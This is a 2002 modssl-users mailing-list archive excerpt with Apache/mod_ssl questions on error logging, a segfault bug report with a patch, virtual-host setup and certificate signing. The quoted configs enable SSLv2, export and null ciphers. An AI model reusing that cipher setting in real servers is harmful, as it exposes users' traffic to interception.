  by lightning.fortheweb.com with SMTP; 3 Aug 2002 06:30:09 -0000
Message-ID: <000401c23ab7$2d4aacd0$c76cfea9@randy8jnfcavgx>
From: "Randy Harmon" 
To: 
Subject: Re: Stop mod_ssl from writing errors to the general Apache error logfile
Date: Fri, 2 Aug 2002 23:29:51 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Randy Harmon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sorry for picking up months later on this thread; I've just gone to the
mailing list archives and lo! there was my problem, discussed but not
resolved satisfactorily.  I'll quote sparingly to bring you back up to
speed.

----- Original Message -----
From: "Owen Boyle" 
Subject: Re: Stop mod_ssl from writing errors to the general Apache error
logfile

[Bert Cortin:]
[clip: "[error] mod_ssl: SSL handshake interrupted by system" is sullying my
ErrorLog against my wishes]
> > I dont what no ErrorLog at all but just no SSL errors in my ErrorLog
(even
> > inside the virtual host!). I don't see the point that if I set
SSLLogLevel
> > to none that this only means that no dedicated SSL logging is done, but
> > messages of level ``error'' are still written to the general Apache
error

> I think you're missing a crucial point - you can have SEVERAL
> error_logs... You do not need to have just one ErrorLog directive, you
> can also have an ErrorLog inside a VH and it will receive log messages
> only from that VH. Since you need a separate VH for SSL, it is easy to
> put an extra ErrorLog directive inside the SSL VH and it will trap all
> the error messages generated by requests to that VH. So your config
> would look like:
>
> ErrorLog logs/main_error_log
> 
>   ErrorLog logs/SSL_error_log
> 
>
> Then you will get TWO error_logs... and the main_error_log will not have
> any SSL errors in it.
[clip: send the SSL VH's error log to /dev/null to not get errors from the
SSL VH]

Sorry, Owen, but it seems like you might be missing the OP's point.  If his
situation is as mine (which by his examples, it clearly is), your solution
doesn't really address the problem.

My specific problem is, my load-balancing system monitors the SSL servers,
and it causes a "SSL handshake interrupted by system" message about 4 times
a minute.  Since I know this isn't a problem, I don't want to see it chewing
roughly 1 kilobyte per minute of disk space - it adds up to 3.6 megs per day
of pure junk.  But I *really* want to see other error messages, especially
those generated by my own modules running in this SSL vhost.

I'd most prefer to skip *just* this message, as I don't regard it as an
error in the first place... and Hopefully the System: Connection reset by
peer (errno: 104) which always follows is easily removed/suppressed at the
same time.  Other mod_ssl errors, I'm happy to be made aware of. Any chance
of getting such a fix into a coming version?

Independently of that specific request, though, I feel there's a misfeature
that could be corrected.  The docs clearly describe the behavior that
SSLLogLevel doesn't affect the ErrorLog, just the SSLLog.  My humble opinion
is that this may be incorrect behavior, regardless of how well-documented.
The symptom is that "SSLLogLevel none" doesn't suppress error messages from
being logged.  One of two fixes seems reasonable to me: Add an
SSLErrorLogLevel directive, to allow separate control over the log level for
the ErrorLog, or make the log level for the ErrorLog pay attention to the
SSLLogLevel directive.

Hopefully my input as a real user of the software is helpful to the
development team, even if I'm not able to contribute the actual patches to
implement my suggestions.  Thanks both retroactively and in advance for the
great software and future refinements, respectively.

Randy


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Aug  4 19:10:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA22252; Sun, 4 Aug 2002 19:09:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from palrel13.hp.com id TAA22248; Sun, 4 Aug 2002 19:08:20 +0200 (MET DST)
Received: from xparelay2.corp.hp.com (xparelay2.corp.hp.com [15.58.137.112])
	by palrel13.hp.com (Postfix) with ESMTP
	id 15B53400799; Sun,  4 Aug 2002 10:08:15 -0700 (PDT)
Received: from xpabh3.corp.hp.com (xpabh3.corp.hp.com [15.58.136.223])
	by xparelay2.corp.hp.com (Postfix) with ESMTP
	id A1A849B; Sun,  4 Aug 2002 10:08:14 -0700 (PDT)
Received: by xpabh3.corp.hp.com with Internet Mail Service (5.5.2655.55)
	id ; Sun, 4 Aug 2002 10:08:14 -0700
Message-ID: 
From: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" 
To: "'dev@httpd.apache.org'" 
Cc: "'modssl-users@modssl.org'" 
Subject: [PATCH - Apache 1.3] Apache 1.3.26 + mod_ssl 2.8.10 dumps core
Date: Sun, 4 Aug 2002 10:08:13 -0700 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
	I'm not sure whom to approach for this problem - so I'm sending it
to both the mailing lists. Here's a pretty easy way to reproduce the SEGV
that I'm experiencing (on HP-UX 11.0 / 11i)

1. Download OpenSSL 0.9.6e, Apache 1.3.26 and mod_ssl 2.8.10
2. Build and install Apache (ofcourse with mod_ssl capability)
3. Set the Timeout to 20 secs (pl. note it's the hard timeout and not the
keepalive / SSLSessionCacheTimeout)
4. Create a simple HTML file (/opt/apache/htdocs/a.html) as follows :
   -----------------------------------------------
   
   side_menu.htm
   
    

    
pdf-test

   
   
   ------------------------------------------------
5. And ofcourse, create /opt/apache/htdocs/10mb.pdf file.
6. Start Apache with SSL capability, and access the URL
https://servername/a.html (Client browser was Win2K box/IE 5.5).
7. Right click on "pdf-test", and select the "Save as" tab. This should
bring up the "Save As" dialog box.
8. Don't do any thing - and you'll see a SEGV in /opt/apache/logs/error_log
after about 20 secs.

Now, is this the expected behavior? I don't believe so. A closer
investigation seemed that mod_SSL had nothing to do with the core dump. It's
the way a aborted connection was handled.

The following patch seemed to resolve the core dump issue for me - but I
don't believe it's the correct fix. Can somebody please evaluate the patch
and let me know if it's okay? Also, I've not evaluated the side-effects of
doing such a thing.
[I don't know what's the difference b/w hard timeout and soft timeout - in
the sense where/how should it be used. It'd be great if somebody could
explain the difference]

Thanks
-Madhu

$ cvs diff http_protocol.c
Index: http_protocol.c
===================================================================
RCS file: /home/cvspublic/apache-1.3/src/main/http_protocol.c,v
retrieving revision 1.325
diff -u -r1.325 http_protocol.c
--- http_protocol.c     9 Jul 2002 15:26:26 -0000       1.325
+++ http_protocol.c     4 Aug 2002 16:54:45 -0000
@@ -2362,7 +2362,7 @@
     if (length == 0)
         return 0;

-    ap_soft_timeout("send body", r);
+    ap_hard_timeout("send body", r);

     while (!r->connection->aborted) {
         if ((length > 0) && (total_bytes_sent + IOBUFSIZE) > length)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Aug  4 19:13:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA22329; Sun, 4 Aug 2002 19:12:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id TAA22325; Sun, 4 Aug 2002 19:11:42 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KKWQOPL0K0002R0O@mdx.ac.uk> for modssl-users@modssl.org; Sun,
 04 Aug 2002 18:11:14 +0100 (BST)
Received: from mdx-nwsup1.nw.mdx.ac.uk (mdx-nwsup1.mdx.ac.uk [158.94.57.9])
 by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KKWQOP8XFS0030P5@mdx.ac.uk>
 for modssl-users@modssl.org; Sun, 04 Aug 2002 18:11:13 +0100 (BST)
Received: from MDX-NWSUP1/SpoolDir by mdx-nwsup1.nw.mdx.ac.uk (Mercury 1.48)
 ; Sun, 04 Aug 2002 18:06:50 +0000
Received: from SpoolDir by MDX-NWSUP1 (Mercury 1.48); Sun,
 04 Aug 2002 18:06:49 +0000
Date: Sun, 04 Aug 2002 18:06:49 +0000
From: a.moon@mdx.ac.uk
Subject: [PATCH - Apache 1.3] Apache 1.3.26 + mod_ssl 2.8.10 dumps core
To: modssl-users@modssl.org
Message-id: <2421A1612F6@mdx-nwsup1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am away from the office until the Monday 5th August 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 06:14:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA04392; Mon, 5 Aug 2002 06:13:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id GAA04279; Mon, 5 Aug 2002 06:12:16 +0200 (MET DST)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c59line96.dialup3.ctm.net [202.175.29.97])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id LAA29431
	for ; Mon, 5 Aug 2002 11:55:15 +0800
Message-ID: <3D4DFB0D.1E9DDDF9@ita.org.mo>
Date: Mon, 05 Aug 2002 12:11:57 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: [Fwd: Problem of Virtual host]
Content-Type: multipart/mixed;
 boundary="------------4660B8A3E0AB6D9B00BBFC3F"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------4660B8A3E0AB6D9B00BBFC3F
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit



--------------4660B8A3E0AB6D9B00BBFC3F
Content-Type: message/rfc822
Content-Disposition: inline

X-Mozilla-Status2: 00000000
Message-ID: <3D4D672A.94E6B675@ita.org.mo>
Date: Mon, 05 Aug 2002 01:40:58 +0800
From: EdwardSPL@ita.org.mo
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: users@httpd.apache.org
Subject: Problem of Virtual host
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hello,

This my setting of virtual-host :


DocumentRoot "/home/domain1/html"
ServerName domain1.com
ServerAdmin root@@domain1.com

 Options Indexes Includes FollowSymLinks MultiViews ExecCGI
 AllowOverride All
 Order allow,deny
 Allow from all

ErrorLog /var/log/httpd/domian1-error.log
CustomLog /var/log/httpd/domain1-access.log common



DocumentRoot "/home/domain1/html"
ServerName www.domain1.com
ServerAdmin root@domain1.com

 Options Indexes Includes FollowSymLinks MultiViews ExecCGI
 AllowOverride All
 Order allow,deny
 Allow from all

ErrorLog /var/log/httpd/domian1-error.log
CustomLog /var/log/httpd/domain1-access.log common


# SSL :



DocumentRoot "/home/domain2/html"
ServerName domain2.com
ServerAdmin root@domain2.com

 Options Indexes Includes FollowSymLinks MultiViews ExecCGI
 AllowOverride All
 Order allow,deny
 Allow from all

ErrorLog /var/log/httpd/domian2-error.log
CustomLog /var/log/httpd/domain2-access.log common
SSLEngine on
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt
SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
CustomLog /usr/local/apache/logs/upp-ssl.log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"





DocumentRoot "/home/domain2/html"
ServerName www.domain2.com
ServerAdmin root@domain2.com

 Options Indexes Includes FollowSymLinks MultiViews ExecCGI
 AllowOverride All
 Order allow,deny
 Allow from all

ErrorLog /var/log/httpd/domian2-error.log
CustomLog /var/log/httpd/domain2-access.log common
SSLEngine on
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt
SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
CustomLog /usr/local/apache/logs/upp-ssl.log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


error_log file :

[Mon Aug  5 01:28:01 2002] [warn] VirtualHost 192.168.200.1:80 overlaps
with VirtualHost 192.168.200.1:80, the first has precedence, perhaps you
need a NameVirtualHost directive
[Mon Aug  5 01:28:01 2002] [warn] VirtualHost 192.168.200.1:80 overlaps
with VirtualHost 192.168.200.1:80, the first has precedence, perhaps you
need a NameVirtualHost directive
[Mon Aug  5 01:28:01 2002] [warn] VirtualHost 192.168.200.1:80 overlaps
with VirtualHost 192.168.200.1:80, the first has precedence, perhaps you
need a NameVirtualHost directive
[Mon Aug  5 01:28:01 2002] [crit] (98)Address already in use: make_sock:
could not bind to port 80

So, can you help me ?

Thanks,

Edward.


--------------4660B8A3E0AB6D9B00BBFC3F--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 07:17:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA05454; Mon, 5 Aug 2002 07:16:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from palrel11.hp.com id HAA05444; Mon, 5 Aug 2002 07:15:25 +0200 (MET DST)
Received: from xparelay2.corp.hp.com (xparelay2.corp.hp.com [15.58.137.112])
	by palrel11.hp.com (Postfix) with ESMTP
	id 68E626007E8; Sun,  4 Aug 2002 22:15:22 -0700 (PDT)
Received: from xpabh4.corp.hp.com (xpabh4.corp.hp.com [15.58.136.1])
	by xparelay2.corp.hp.com (Postfix) with ESMTP
	id 314BAA0; Sun,  4 Aug 2002 22:15:22 -0700 (PDT)
Received: by xpabh4.corp.hp.com with Internet Mail Service (5.5.2655.55)
	id ; Sun, 4 Aug 2002 22:15:21 -0700
Message-ID: 
From: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" 
To: "'dev@httpd.apache.org'" 
Cc: "'modssl-users@modssl.org'" 
Subject: RE: [PATCH - Apache 1.3] Apache 1.3.26 + mod_ssl 2.8.10 dumps cor
	e
Date: Sun, 4 Aug 2002 22:15:21 -0700 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
List-Help: 
List-Unsubscribe: 
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I do realize that the Apache community does not support such a usage of
Apache (with mod_ssl) - but I was wondering if somebody could atleast tell
me if the patch was okay / not okay. 

Thanks
-Madhu 

-----Original Message-----
From: MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)
To: 'dev@httpd.apache.org'
Cc: 'modssl-users@modssl.org'
Sent: 8/4/02 10:08 AM
Subject: [PATCH - Apache 1.3] Apache 1.3.26 + mod_ssl 2.8.10 dumps core

Hi,
	I'm not sure whom to approach for this problem - so I'm sending
it
to both the mailing lists. Here's a pretty easy way to reproduce the
SEGV
that I'm experiencing (on HP-UX 11.0 / 11i)

1. Download OpenSSL 0.9.6e, Apache 1.3.26 and mod_ssl 2.8.10
2. Build and install Apache (ofcourse with mod_ssl capability)
3. Set the Timeout to 20 secs (pl. note it's the hard timeout and not
the
keepalive / SSLSessionCacheTimeout)
4. Create a simple HTML file (/opt/apache/htdocs/a.html) as follows :
   -----------------------------------------------
   
   side_menu.htm
   
    

    
pdf-test

   
   
   ------------------------------------------------
5. And ofcourse, create /opt/apache/htdocs/10mb.pdf file.
6. Start Apache with SSL capability, and access the URL
https://servername/a.html (Client browser was Win2K box/IE 5.5).
7. Right click on "pdf-test", and select the "Save as" tab. This should
bring up the "Save As" dialog box.
8. Don't do any thing - and you'll see a SEGV in
/opt/apache/logs/error_log
after about 20 secs.

Now, is this the expected behavior? I don't believe so. A closer
investigation seemed that mod_SSL had nothing to do with the core dump.
It's
the way a aborted connection was handled.

The following patch seemed to resolve the core dump issue for me - but I
don't believe it's the correct fix. Can somebody please evaluate the
patch
and let me know if it's okay? Also, I've not evaluated the side-effects
of
doing such a thing.
[I don't know what's the difference b/w hard timeout and soft timeout -
in
the sense where/how should it be used. It'd be great if somebody could
explain the difference]

Thanks
-Madhu

$ cvs diff http_protocol.c
Index: http_protocol.c
===================================================================
RCS file: /home/cvspublic/apache-1.3/src/main/http_protocol.c,v
retrieving revision 1.325
diff -u -r1.325 http_protocol.c
--- http_protocol.c     9 Jul 2002 15:26:26 -0000       1.325
+++ http_protocol.c     4 Aug 2002 16:54:45 -0000
@@ -2362,7 +2362,7 @@
     if (length == 0)
         return 0;

-    ap_soft_timeout("send body", r);
+    ap_hard_timeout("send body", r);

     while (!r->connection->aborted) {
         if ((length > 0) && (total_bytes_sent + IOBUFSIZE) > length)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 10:25:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA08857; Mon, 5 Aug 2002 10:24:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id KAA08852; Mon, 5 Aug 2002 10:23:56 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H0D3BL00.1BL for ; Mon, 5 Aug 2002
          09:23:45 +0100 
Message-ID: <3D4E360F.9040303@itaction.co.uk>
Date: Mon, 05 Aug 2002 09:23:43 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [Fwd: Problem of Virtual host]
References: <3D4DFB0D.1E9DDDF9@ita.org.mo>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

a) put port numbers into your virtualhost headers eg:


#for http vhosts


#for ssl vhosts.

(and dont forget to add Listen directives for both ports 80 and 443... see example httpd.conf).

b) use a NameVirtualHost directive for the port 80 vhosts
NameVirtualHost 192.168.200.1:80
(or just have one vhost, in your example there is no difference between the two, so why not just have one?)

c) you cant really use namevirtualhost on SSL vhosts - well it will run, but you'll get issues with certificates - see the FAQ at http://www.modssl.org/

d) the errorlog says you cant start apache because there is another program already running which is listening on port 80 - or possibly its that you are not running apache as root (and therefore cannot bind to ports less than 1024).



EdwardSPL@ita.org.mo wrote:

>
> ------------------------------------------------------------------------
>
> Subject:
> Problem of Virtual host
> From:
> EdwardSPL@ita.org.mo
> Date:
> Mon, 05 Aug 2002 01:40:58 +0800
> To:
> users@httpd.apache.org
>
>
>Hello,
>
>This my setting of virtual-host :
>
>
>DocumentRoot "/home/domain1/html"
>ServerName domain1.com
>ServerAdmin root@@domain1.com
>
> Options Indexes Includes FollowSymLinks MultiViews ExecCGI
> AllowOverride All
> Order allow,deny
> Allow from all
>
>ErrorLog /var/log/httpd/domian1-error.log
>CustomLog /var/log/httpd/domain1-access.log common
>
>
>
>DocumentRoot "/home/domain1/html"
>ServerName www.domain1.com
>ServerAdmin root@domain1.com
>
> Options Indexes Includes FollowSymLinks MultiViews ExecCGI
> AllowOverride All
> Order allow,deny
> Allow from all
>
>ErrorLog /var/log/httpd/domian1-error.log
>CustomLog /var/log/httpd/domain1-access.log common
>
>
># SSL :
>
>
>
>DocumentRoot "/home/domain2/html"
>ServerName domain2.com
>ServerAdmin root@domain2.com
>
> Options Indexes Includes FollowSymLinks MultiViews ExecCGI
> AllowOverride All
> Order allow,deny
> Allow from all
>
>ErrorLog /var/log/httpd/domian2-error.log
>CustomLog /var/log/httpd/domain2-access.log common
>SSLEngine on
>SSLCipherSuite
>ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt
>SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key
>
>    SSLOptions +StdEnvVars
>
>
>    SSLOptions +StdEnvVars
>
>SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>CustomLog /usr/local/apache/logs/upp-ssl.log \
>          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
>
>
>
>
>DocumentRoot "/home/domain2/html"
>ServerName www.domain2.com
>ServerAdmin root@domain2.com
>
> Options Indexes Includes FollowSymLinks MultiViews ExecCGI
> AllowOverride All
> Order allow,deny
> Allow from all
>
>ErrorLog /var/log/httpd/domian2-error.log
>CustomLog /var/log/httpd/domain2-access.log common
>SSLEngine on
>SSLCipherSuite
>ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt
>SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key
>
>    SSLOptions +StdEnvVars
>
>
>    SSLOptions +StdEnvVars
>
>SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>CustomLog /usr/local/apache/logs/upp-ssl.log \
>          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
>
>error_log file :
>
>[Mon Aug  5 01:28:01 2002] [warn] VirtualHost 192.168.200.1:80 overlaps
>with VirtualHost 192.168.200.1:80, the first has precedence, perhaps you
>need a NameVirtualHost directive
>[Mon Aug  5 01:28:01 2002] [warn] VirtualHost 192.168.200.1:80 overlaps
>with VirtualHost 192.168.200.1:80, the first has precedence, perhaps you
>need a NameVirtualHost directive
>[Mon Aug  5 01:28:01 2002] [warn] VirtualHost 192.168.200.1:80 overlaps
>with VirtualHost 192.168.200.1:80, the first has precedence, perhaps you
>need a NameVirtualHost directive
>[Mon Aug  5 01:28:01 2002] [crit] (98)Address already in use: make_sock:
>could not bind to port 80
>
>So, can you help me ?
>
>Thanks,
>
>Edward.
>
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 10:26:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA08866; Mon, 5 Aug 2002 10:25:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.lab.te.sia.it id KAA08859; Mon, 5 Aug 2002 10:24:31 +0200 (MET DST)
Received: from iris (IDENT:W0v5mGf5J0Hbai1w9LjgGyXnnMNqdfZU@iris.lab.te.sia.it [127.0.0.1] (may be forged))
	by iris.lab.te.sia.it (8.11.6/8.11.6) with ESMTP id g758OZ805420
	for ; Mon, 5 Aug 2002 08:24:37 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: [Fwd: Problem of Virtual host]
Date: Mon, 5 Aug 2002 10:24:34 +0200
User-Agent: KMail/1.4.1
References: <3D4DFB0D.1E9DDDF9@ita.org.mo>
In-Reply-To: <3D4DFB0D.1E9DDDF9@ita.org.mo>
MIME-Version: 1.0
Message-Id: <200208051024.34571.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA08861
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Monday 05 August 2002 06:11 am, EdwardSPL@ita.org.mo wrote:


# SSL :





try


-- maumar

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 17:31:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA17287; Mon, 5 Aug 2002 17:30:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from smtp25.baruch.cuny.edu id RAA17229; Mon, 5 Aug 2002 17:29:49 +0200 (MET DST)
Received: (qmail 19416 invoked by uid 0); 5 Aug 2002 15:27:49 -0000
Received: from unknown (HELO 8wpkx01.mindspring.com) (150.210.151.45)
  by smtp25.baruch.cuny.edu with SMTP; 5 Aug 2002 15:27:49 -0000
Message-Id: <5.0.2.1.0.20020805112502.00a89030@pop.mindspring.com>
X-Sender: choepete@pop.mindspring.com
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Mon, 05 Aug 2002 11:29:10 -0400
To: modssl-users@modssl.org
From: Peter Choe 
Subject: self signed certificate
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Choe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i am trying to create a self signed certificate on my server for apache 
webserver.  i am using mod_ssl-2.8.9.

when i run the sign.sh script to sign the server certificate i generated, i 
get the following errors:

Write out database with 1 new entries
Data Base Updated
CA verifying: server.crt <-> CA cert
server.crt: /C=US/ST=New York/L=New York/O=foo/OU=BCTC/CN=foobar.com
error 18 at 0 depth lookup:self signed certificate
/C=US/ST=New York/L=New York/O=foo/OU=bar/CN=foobar.com
error 7 at 0 depth lookup:certificate signature failure

the script creates a server.crt file, but when i try to access an https 
page, i get a page cannot be displayed message.

anybody know how i can fix this?

Peter Choe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 21:04:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23265; Mon, 5 Aug 2002 21:03:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA23202; Mon, 5 Aug 2002 21:02:28 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 486A44CE77A; Mon,  5 Aug 2002 21:02:24 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 11DDF28857; Mon,  5 Aug 2002 19:35:36 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from host210.digitalpulp.com id RAA17472; Mon, 5 Aug 2002 17:42:46 +0200 (MET DST)
Received: from localhost (localhost [[UNIX: localhost]])
	by host210.digitalpulp.com (8.11.6/8.11.6) id g75FgYE12657
	for modssl-users@modssl.org; Mon, 5 Aug 2002 11:42:34 -0400
Content-Type: text/plain;
  charset="us-ascii"
From: Laurence Berland 
To: modssl-users@modssl.org
Subject: Error starting apache
Date: Mon, 5 Aug 2002 11:42:34 -0400
User-Agent: KMail/1.4.1
MIME-Version: 1.0
Message-Id: <200208051142.34659.laurence@isp.nwu.edu>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA17473
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Laurence Berland 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm trying to use apache with mod_ssl using the RPMs from redhat:
[root@wiggum conf]# rpm -q apache
apache-1.3.19-5
[root@wiggum conf]# rpm -q mod_ssl
mod_ssl-2.8.1-5

